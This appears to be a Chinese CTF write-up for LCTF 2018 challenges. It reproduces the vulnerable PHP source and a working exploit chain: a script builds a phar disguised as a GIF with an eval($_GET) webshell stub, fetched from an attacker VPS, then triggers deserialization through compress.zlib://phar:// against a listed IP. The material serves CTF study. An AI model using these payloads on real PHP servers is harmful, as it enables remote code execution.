LCTF wp简单复现

1、T4lk 1s ch34p,sh0w m3 the sh31l

代码如下：

<?php

$SECRET  = `../read_secret`;                                  
$SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);
$FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);   
mkdir($SANDBOX);
mkdir($FILEBOX);
echo "$FILEBOX";


if (!isset($_COOKIE["session-data"])) {
    $data = serialize(new User($SANDBOX));
    $hmac = hash_hmac("md5", $data, $SECRET);
    setcookie("session-data", sprintf("%s-----%s", $data, $hmac));      
}


class User {
    public $avatar;
    function __construct($path) {
        $this->avatar = $path;                                          
    }
}


class K0rz3n_secret_flag {
    protected $file_path;
    function __destruct(){
        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
            die("Sorry Sorry Sorry");
        }
    include_once($this->file_path);
 }
}

function check_session() {
    global $SECRET;
    $data = $_COOKIE["session-data"];
    list($data, $hmac) = explode("-----", $data, 2);
    if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){
        die("Bye");
    }
    if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){
        die("Bye Bye");
    }
    $data = unserialize($data);

    if ( !isset($data->avatar) ){
        die("Bye Bye Bye");
    }
    return $data->avatar;//返回上传路径                                               
}


function upload($path) {
    if(isset($_GET['url'])){
         if(preg_match('/^(http|https).*/i', $_GET['url'])){
            $data = file_get_contents($_GET["url"] . "/avatar.gif");                                                                                     
            if (substr($data, 0, 6) !== "GIF89a"){
                die("Fuck off");
            }
            //?m=upload&url=http://vps/avatar.gif
            file_put_contents($path . "/avatar.gif", $data);
            die("Upload OK");
        }else{
            die("Hacker");
        }           
    }else{
        die("Miss the URL~~");
    }
}


function show($path) {
    if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) {

        $path = "/var/www";
    }
    header("Content-Type: image/gif");
    die(file_get_contents($path . "/avatar.gif"));                     
}



function check($path){
    if(isset($_GET['c'])){
        if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\s)*|(.|\s)*(file)(.|\s)*/i',$_GET['c'])){
            die("Hacker Hacker Hacker");
        }else{
            $file_path = $_GET['c'];
            list($width, $height, $type) = @getimagesize($file_path);
            die("Width is ：" . $width." px<br>" .
                "Height is ：" . $height." px<br>");
        }
    }else{
        list($width, $height, $type) = @getimagesize($path."/avatar.gif");
        die("Width is ：" . $width." px<br>" .
            "Height is ：" . $height." px<br>");
    }
}


function move($source_path,$dest_name){
    global $FILEBOX;
    $dest_path = $FILEBOX . "/" . $dest_name;
    if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|..|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){
        die("Hacker Hacker Hacker");
    }else{
        if(copy($source_path,$dest_path)){
            die("Successful copy");
        }else{
            die("Copy failed");
        }
    }
}




$mode = $_GET["m"];

if ($mode == "upload"){
     upload(check_session());
}
else if ($mode == "show"){
    show(check_session());
}
else if ($mode == "check"){
    check(check_session());
}
else if($mode == "move"){
    move($_GET['source'],$_GET['dest']);
}
else{

    highlight_file(__FILE__);    
}

1、上传恶意文件，反序列化的时候包含上传的文件，注意生成的avatar.gif不仅可以反序列化覆盖上传路径$file_path，也可以通过setStub向恶意文件中写入php代码，文件包含

?m=upload&url=http://vps/avatar.gif

<?php
class K0rz3n_secret_flag {
    protected $file_path='/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif';
    function __destruct(){
        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
            die("Sorry Sorry Sorry");
        }
    include_once($this->file_path);
    }
 }

$a= new K0rz3n_secret_flag();
$p = new Phar('./1.phar', 0);
$p->startBuffering();
$p->setStub('GIF89a<?php echo 1;eval($_GET["a"]);?'.'><?php __HALT_COMPILER(); ?'.'>');
$p->setMetadata($a);
$p->addFromString('1.txt','text');
$p->stopBuffering();
rename('./1.phar', 'avatar.gif');

生成的恶意文件

2、check的时候触发反序列化。通过compress.zlib://phar绕过正则。参考链接：https://blog.zsxsoft.com/post/38

 http://212.64.7.171/LCTF.php?m=check&c=compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif&a=phpinfo();

2、bestphp's revenge

通过Soap类进行反序列化，进行ssrf.具体参考：https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

参考链接：

https://xz.aliyun.com/t/3341#toc-8

https://xz.aliyun.com/t/3339#toc-4

https://xz.aliyun.com/t/3340#toc-3

http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

相关阅读:
每日记载内容总结33
华为机试-尼科彻斯定理
 华为机试-求最大连续bit数
 华为机试-合法IP
华为机试-票数统计
 华为机试-等差数列
 华为机试-自守数
 中序表达式转后序表式式
 华为机考给你一个N*M的矩阵，每个位置的值是0或1，求一个面积最大的子矩阵，这个矩阵必须是一个正方形，且里面只能由1构成，输出最大的正方形边长。其中n,m<=400;
华为机试-求解立方根
原文地址：https://www.cnblogs.com/afanti/p/9987094.html